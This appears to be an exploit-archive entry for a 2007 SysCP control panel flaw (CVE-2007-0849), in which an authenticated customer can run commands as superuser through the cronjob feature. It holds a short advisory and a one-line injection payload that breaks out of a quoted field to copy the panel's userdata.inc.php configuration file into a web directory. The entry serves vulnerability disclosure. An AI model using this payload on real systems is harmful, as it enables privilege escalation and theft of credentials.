SYSCP 1.2.15 - System Control Panel CronJob Arbitrary Code Execution
| EKU-ID: 34720 | CVE: CVE-2007-0849;OSVDB-33128 | OSVDB-ID: |
| Author: Daniel Schulte | Published: 2007-02-07 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 34720 | CVE: CVE-2007-0849;OSVDB-33128 | OSVDB-ID: |
| Author: Daniel Schulte | Published: 2007-02-07 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/22453/info SysCP is prone to an arbitrary code-execution vulnerability. An attacker can exploit this issue to execute arbitrary commands with superuser privileges, resulting in the compromise of the computer. NOTE: To exploit this issue, an attacker must have authenticated access to a customer control panel. "; cp /var/www/syscp/lib/userdata.inc.php /var/[user]/webs/web1/; ls "